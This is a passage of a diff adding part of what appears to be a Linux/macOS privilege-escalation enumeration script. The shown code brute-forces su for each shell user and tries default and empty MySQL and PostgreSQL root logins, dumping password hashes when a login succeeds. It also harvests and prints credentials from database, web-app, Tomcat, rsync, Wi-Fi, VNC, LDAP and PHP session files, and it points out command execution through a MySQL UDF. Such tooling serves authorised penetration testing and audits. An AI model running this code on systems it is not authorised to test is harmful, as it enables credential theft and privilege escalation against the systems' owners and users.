+ printf "%s\n" "$SHELLUSERS" | while read u; do
+ echo " Bruteforcing user $u..."
+ su_brute_user_num "$u" $PASSTRY
+ done
+ else
+ printf $GREEN"It's not possible to brute-force su.\n\n"$NC
+ fi
+else
+ print_2title "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)\n"$NC
+fi
+print_2title "Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC
+
+fi
+echo ''
+echo ''
+if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi
+
+if echo $CHECKS | grep -q software_information; then
+print_title "Software Information"
+###########################################
+#--------) Software Information (---------#
+###########################################
+
+NGINX_KNOWN_MODULES="ngx_http_geoip_module.so|ngx_http_xslt_filter_module.so|ngx_stream_geoip_module.so|ngx_http_image_filter_module.so|ngx_mail_module.so|ngx_stream_module.so"
+
+#-- SI) Useful software
+if ! [ "SEARCH_IN_FOLDER" ]; then
+ print_2title "Useful software"
+ for tool in $USEFUL_SOFTWARE; do command -v "$tool"; done
+ echo ""
+fi
+
+#-- SI) Search for compilers
+if ! [ "SEARCH_IN_FOLDER" ]; then
+ print_2title "Installed Compilers"
+ (dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; command -v gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/");
+ echo ""
+
+ if [ "$(command -v pkg 2>/dev/null)" ]; then
+ print_2title "Vulnerable Packages"
+ pkg audit -F | sed -${E} "s,vulnerable,${SED_RED},g"
+ echo ""
+ fi
+
+ if [ "$(command -v brew 2>/dev/null)" ]; then
+ print_2title "Brew Installed Packages"
+ brew list
+ echo ""
+ fi
+fi
+
+if [ "$MACPEAS" ]; then
+ print_2title "Writable Installed Applications"
+ system_profiler SPApplicationsDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do
+ if [ -w "$f" ]; then
+ echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g"
+ fi
+ done
+
+ system_profiler SPFrameworksDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do
+ if [ -w "$f" ]; then
+ echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g"
+ fi
+ done
+fi
+
+#-- SI) Mysql version
+if [ "$(command -v mysql)" ] || [ "$(command -v mysqladmin)" ] || [ "$DEBUG" ]; then
+ print_2title "MySQL version"
+ mysql --version 2>/dev/null || echo_not_found "mysql"
+ mysqluser=$(systemctl status mysql 2>/dev/null | grep -o ".\{0,0\}user.\{0,50\}" | cut -d '=' -f2 | cut -d ' ' -f1)
+ if [ "$mysqluser" ]; then
+ echo "MySQL user: $mysqluser" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
+ fi
+ echo ""
+ echo ""
+
+ #-- SI) Mysql connection root/root
+ print_list "MySQL connection using default root/root ........... "
+ mysqlconnect=$(mysqladmin -uroot -proot version 2>/dev/null)
+ if [ "$mysqlconnect" ]; then
+ echo "Yes" | sed -${E} "s,.*,${SED_RED},"
+ mysql -u root --password=root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
+ else echo_no
+ fi
+
+ #-- SI) Mysql connection root/toor
+ print_list "MySQL connection using root/toor ................... "
+ mysqlconnect=$(mysqladmin -uroot -ptoor version 2>/dev/null)
+ if [ "$mysqlconnect" ]; then
+ echo "Yes" | sed -${E} "s,.*,${SED_RED},"
+ mysql -u root --password=toor -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
+ else echo_no
+ fi
+
+ #-- SI) Mysql connection root/NOPASS
+ mysqlconnectnopass=$(mysqladmin -uroot version 2>/dev/null)
+ print_list "MySQL connection using root/NOPASS ................. "
+ if [ "$mysqlconnectnopass" ]; then
+ echo "Yes" | sed -${E} "s,.*,${SED_RED},"
+ mysql -u root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
+ else echo_no
+ fi
+ echo ""
+fi
+
+#-- SI) Mysql credentials
+if [ "$PSTORAGE_MYSQL" ] || [ "$DEBUG" ]; then
+ print_2title "Searching mysql credentials and exec"
+ printf "%s\n" "$PSTORAGE_MYSQL" | while read d; do
+ if [ -f "$d" ] && ! [ "$(basename $d)" = "mysql" ]; then # Only interested in "mysql" that are folders (filesaren't the ones with creds)
+ STRINGS="`command -v strings`"
+ echo "Potential file containing credentials:"
+ ls -l "$d"
+ if [ "$STRINGS" ]; then
+ strings "$d"
+ else
+ echo "Strings not found, cat the file and check it to get the creds"
+ fi
+
+ else
+ for f in $(find $d -name debian.cnf 2>/dev/null); do
+ if [ -r "$f" ]; then
+ echo "We can read the mysql debian.cnf. You can use this username/password to log in MySQL" | sed -${E} "s,.*,${SED_RED},"
+ cat "$f"
+ fi
+ done
+
+ for f in $(find $d -name user.MYD 2>/dev/null); do
+ if [ -r "$f" ]; then
+ echo "We can read the Mysql Hashes from $f" | sed -${E} "s,.*,${SED_RED},"
+ grep -oaE "[-_\.\*a-Z0-9]{3,}" "$f" | grep -v "mysql_native_password"
+ fi
+ done
+
+ for f in $(grep -lr "user\s*=" $d 2>/dev/null | grep -v "debian.cnf"); do
+ if [ -r "$f" ]; then
+ u=$(cat "$f" | grep -v "#" | grep "user" | grep "=" 2>/dev/null)
+ echo "From '$f' Mysql user: $u" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
+ fi
+ done
+
+ for f in $(find $d -name my.cnf 2>/dev/null); do
+ if [ -r "$f" ]; then
+ echo "Found readable $f"
+ grep -v "^#" "$f" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed "s,password.*,${SED_RED},"
+ fi
+ done
+ fi
+
+ mysqlexec=$(whereis lib_mysqludf_sys.so 2>/dev/null | grep "lib_mysqludf_sys\.so")
+ if [ "$mysqlexec" ]; then
+ echo "Found $mysqlexec"
+ echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed -${E} "s,.*,${SED_RED},"
+ fi
+ done
+fi
+echo ""
+
+if [ "$PSTORAGE_MARIADB" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing MariaDB Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_MARIADB\" | grep -E \"mariadb\.cnf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "mariadb.cnf"; fi; fi; printf "%s" "$PSTORAGE_MARIADB" | grep -E "mariadb\.cnf$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,mariadb\.cnf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,user.*|password.*,${SED_RED},g"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_MARIADB\" | grep -E \"debian\.cnf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "debian.cnf"; fi; fi; printf "%s" "$PSTORAGE_MARIADB" | grep -E "debian\.cnf$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,debian\.cnf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "user.*|password.*" | sed -${E} "s,user.*|password.*,${SED_RED},g"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_POSTGRESQL" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing PostgreSQL Files (limit 70)"
+ echo "Version: $(warn_exec psql -V 2>/dev/null)"
+ if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pgadmin.*\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pgadmin*.db"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pgadmin.*\.db$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,pgadmin.*\.db$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pg_hba\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pg_hba.conf"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pg_hba\.conf$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,pg_hba\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"postgresql\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "postgresql.conf"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "postgresql\.conf$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,postgresql\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pgsql\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pgsql.conf"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pgsql\.conf$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,pgsql\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo "";
+fi
+
+
+#-- SI) PostgreSQL brute
+if [ "$TIMEOUT" ] && [ "$(command -v psql)" ] || [ "$DEBUG" ]; then # In some OS (like OpenBSD) it will expect the password from console and will pause the script. Also, this OS doesn't have the "timeout" command so lets only use this checks in OS that has it.
+#checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this
+ print_list "PostgreSQL connection to template0 using postgres/NOPASS ........ "
+ if [ "$(timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED},"
+ else echo_no
+ fi
+
+ print_list "PostgreSQL connection to template1 using postgres/NOPASS ........ "
+ if [ "$(timeout 1 psql -U postgres -d template1 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed "s,.*,${SED_RED},"
+ else echo_no
+ fi
+
+ print_list "PostgreSQL connection to template0 using pgsql/NOPASS ........... "
+ if [ "$(timeout 1 psql -U pgsql -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED},"
+ else echo_no
+ fi
+
+ print_list "PostgreSQL connection to template1 using pgsql/NOPASS ........... "
+ if [ "$(timeout 1 psql -U pgsql -d template1 -c 'select version()' 2> /dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED},"
+ else echo_no
+ fi
+ echo ""
+fi
+
+if [ "$PSTORAGE_MONGO" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Mongo Files (limit 70)"
+ echo "Version: $(warn_exec mongo --version 2>/dev/null; warn_exec mongod --version 2>/dev/null)"
+ if [ "$(command -v mongo)" ]; then echo "show dbs" | mongo 127.0.0.1 > /dev/null 2>&1;[ "$?" == "0" ] && echo "Possible mongo anonymous authentication" | sed -${E} "s,.*|kube,${SED_RED},"; fi
+ if ! [ "`echo \"$PSTORAGE_MONGO\" | grep -E \"mongod.*\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "mongod*.conf"; fi; fi; printf "%s" "$PSTORAGE_MONGO" | grep -E "mongod.*\.conf$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,mongod.*\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_APACHE_NGINX" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Apache-Nginx Files (limit 70)"
+ echo "Apache version: $(warn_exec apache2 -v 2>/dev/null; warn_exec httpd -v 2>/dev/null)"
+ echo "Nginx version: $(warn_exec nginx -v 2>/dev/null)"
+ if [ -d "/etc/apache2" ] && [ -r "/etc/apache2" ]; then 'grep -R -B1 "httpd-php" /etc/apache2 2>/dev/null'; fi
+ if [ -d "/usr/share/nginx/modules" ] && [ -r "/usr/share/nginx/modules" ]; then print_3title 'Nginx modules'; ls /usr/share/nginx/modules | sed -${E} "s,$NGINX_KNOWN_MODULES,${SED_GREEN},g"; fi
+ print_3title 'PHP exec extensions'
+ if ! [ "`echo \"$PSTORAGE_APACHE_NGINX\" | grep -E \"sites-enabled$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sites-enabled"; fi; fi; printf "%s" "$PSTORAGE_APACHE_NGINX" | grep -E "sites-enabled$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,sites-enabled$,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "#" | sed -${E} "s,AuthType|AuthName|AuthUserFile|ServerName|ServerAlias|command on,${SED_RED},g"; done; echo "";done; echo "";
+ if ! [ "`echo \"$PSTORAGE_APACHE_NGINX\" | grep -E \"000-default\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "000-default.conf"; fi; fi; printf "%s" "$PSTORAGE_APACHE_NGINX" | grep -E "000-default\.conf$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,000-default\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "#" | sed -${E} "s,AuthType|AuthName|AuthUserFile|ServerName|ServerAlias,${SED_RED},g"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_APACHE_NGINX\" | grep -E \"php\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "php.ini"; fi; fi; printf "%s" "$PSTORAGE_APACHE_NGINX" | grep -E "php\.ini$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,php\.ini$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "allow_" | grep -Ev "^;" | sed -${E} "s,On,${SED_RED},g"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_TOMCAT" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Tomcat Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_TOMCAT\" | grep -E \"tomcat-users\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "tomcat-users.xml"; fi; fi; printf "%s" "$PSTORAGE_TOMCAT" | grep -E "tomcat-users\.xml$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,tomcat-users\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "username=|password=" | sed -${E} "s,dbtype|dbhost|dbuser|dbhost|dbpass|dbport,${SED_RED},g"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_FASTCGI" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing FastCGI Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_FASTCGI\" | grep -E \"fastcgi_params$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "fastcgi_params"; fi; fi; printf "%s" "$PSTORAGE_FASTCGI" | grep -E "fastcgi_params$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,fastcgi_params$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "DB_NAME|DB_USER|DB_PASS" | sed -${E} "s,DB_NAME|DB_USER|DB_PASS,${SED_RED},g"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_HTTP_CONF" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Http conf Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_HTTP_CONF\" | grep -E \"httpd\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "httpd.conf"; fi; fi; printf "%s" "$PSTORAGE_HTTP_CONF" | grep -E "httpd\.conf$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,httpd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "htaccess.*|htpasswd.*" | grep -Ev "\W+\#|^#" | sed -${E} "s,htaccess.*|htpasswd.*,${SED_RED},g"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_HTPASSWD" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Htpasswd Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_HTPASSWD\" | grep -E \"\.htpasswd$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".htpasswd"; fi; fi; printf "%s" "$PSTORAGE_HTPASSWD" | grep -E "\.htpasswd$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,\.htpasswd$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_PHP_SESSIONS" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing PHP Sessions Files (limit 70)"
+ ls /var/lib/php/sessions 2>/dev/null || echo_not_found /var/lib/php/sessions
+ if ! [ "`echo \"$PSTORAGE_PHP_SESSIONS\" | grep -E \"sess_.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sess_*"; fi; fi; printf "%s" "$PSTORAGE_PHP_SESSIONS" | grep -E "sess_.*$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,sess_.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_WORDPRESS" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Wordpress Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_WORDPRESS\" | grep -E \"wp-config\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "wp-config.php"; fi; fi; printf "%s" "$PSTORAGE_WORDPRESS" | grep -E "wp-config\.php$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,wp-config\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "PASSWORD|USER|NAME|HOST" | sed -${E} "s,PASSWORD|USER|NAME|HOST,${SED_RED},g"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_DRUPAL" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Drupal Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_DRUPAL\" | grep -E \"settings\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "settings.php"; fi; fi; printf "%s" "$PSTORAGE_DRUPAL" | grep -E "settings\.php$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,settings\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "drupal_hash_salt|'database'|'username'|'password'|'host'|'port'|'driver'|'prefix'" | sed -${E} "s,drupal_hash_salt|'database'|'username'|'password'|'host'|'port'|'driver'|'prefix',${SED_RED},g"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_MOODLE" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Moodle Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_MOODLE\" | grep -E \"config\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "config.php"; fi; fi; printf "%s" "$PSTORAGE_MOODLE" | grep -E "config\.php$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,config\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "dbtype|dbhost|dbuser|dbhost|dbpass|dbport" | sed -${E} "s,dbtype|dbhost|dbuser|dbhost|dbpass|dbport,${SED_RED},g"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_SUPERVISORD" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Supervisord Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_SUPERVISORD\" | grep -E \"supervisord\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "supervisord.conf"; fi; fi; printf "%s" "$PSTORAGE_SUPERVISORD" | grep -E "supervisord\.conf$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,supervisord\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "port.*=|username.*=|password.*=" | sed -${E} "s,port.*=|username.*=|password.*=,${SED_RED},g"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_CESI" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Cesi Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_CESI\" | grep -E \"cesi\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "cesi.conf"; fi; fi; printf "%s" "$PSTORAGE_CESI" | grep -E "cesi\.conf$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,cesi\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "username.*=|password.*=|host.*=|port.*=|database.*=" | sed -${E} "s,username.*=|password.*=|host.*=|port.*=|database.*=,${SED_RED},g"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_RSYNC" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Rsync Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_RSYNC\" | grep -E \"rsyncd\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "rsyncd.conf"; fi; fi; printf "%s" "$PSTORAGE_RSYNC" | grep -E "rsyncd\.conf$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,rsyncd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,secrets.*|auth.*users.*=,${SED_RED},g"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_RSYNC\" | grep -E \"rsyncd\.secrets$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "rsyncd.secrets"; fi; fi; printf "%s" "$PSTORAGE_RSYNC" | grep -E "rsyncd\.secrets$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,rsyncd\.secrets$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_HOSTAPD" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Hostapd Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_HOSTAPD\" | grep -E \"hostapd\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "hostapd.conf"; fi; fi; printf "%s" "$PSTORAGE_HOSTAPD" | grep -E "hostapd\.conf$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,hostapd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,passphrase.*,${SED_RED},g"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_WIFI_CONNECTIONS" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Wifi Connections Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_WIFI_CONNECTIONS\" | grep -E \"system-connections$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "system-connections"; fi; fi; printf "%s" "$PSTORAGE_WIFI_CONNECTIONS" | grep -E "system-connections$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,system-connections$,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "psk.*" | sed -${E} "s,psk.*,${SED_RED},g"; done; echo "";done; echo "";
+fi
+
+
+if [ "$PSTORAGE_ANACONDA_KS" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Anaconda ks Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_ANACONDA_KS\" | grep -E \"anaconda-ks\.cfg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "anaconda-ks.cfg"; fi; fi; printf "%s" "$PSTORAGE_ANACONDA_KS" | grep -E "anaconda-ks\.cfg$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,anaconda-ks\.cfg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "rootpw.*" | sed -${E} "s,rootpw.*,${SED_RED},g"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_VNC" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing VNC Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"\.vnc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".vnc"; fi; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "\.vnc$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,\.vnc$,${SED_RED},"; find "$f" -name "passwd" | while read ff; do ls -ld "$ff" | sed -${E} "s,passwd,${SED_RED},"; done; echo "";done; echo "";
+ if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.c.*nf.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*vnc*.c*nf*"; fi; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.c.*nf.*$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,vnc.*\.c.*nf.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*vnc*.ini"; fi; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.ini$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,vnc.*\.ini$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.txt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*vnc*.txt"; fi; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.txt$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,vnc.*\.txt$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*vnc*.xml"; fi; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.xml$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,vnc.*\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_OPENVPN" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing OpenVPN Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_OPENVPN\" | grep -E \"\.ovpn$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.ovpn"; fi; fi; printf "%s" "$PSTORAGE_OPENVPN" | grep -E "\.ovpn$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,\.ovpn$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "auth-user-pass.+" | sed -${E} "s,auth-user-pass.+,${SED_RED},g"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_LDAP" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Ldap Files (limit 70)"
+ echo "The password hash is from the {SSHA} to 'structural'"
+ if ! [ "`echo \"$PSTORAGE_LDAP\" | grep -E \"ldap$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ldap"; fi; fi; printf "%s" "$PSTORAGE_LDAP" | grep -E "ldap$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,ldap$,${SED_RED},"; find "$f" -name "*.bdb" | while read ff; do ls -ld "$ff" | sed -${E} "s,.bdb,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E -i -a -o "description.*" | sort | uniq | sed -${E} "s,administrator|password|ADMINISTRATOR|PASSWORD|Password|Administrator,${SED_RED},g"; done; echo "";done; echo "";
+fi
+
+
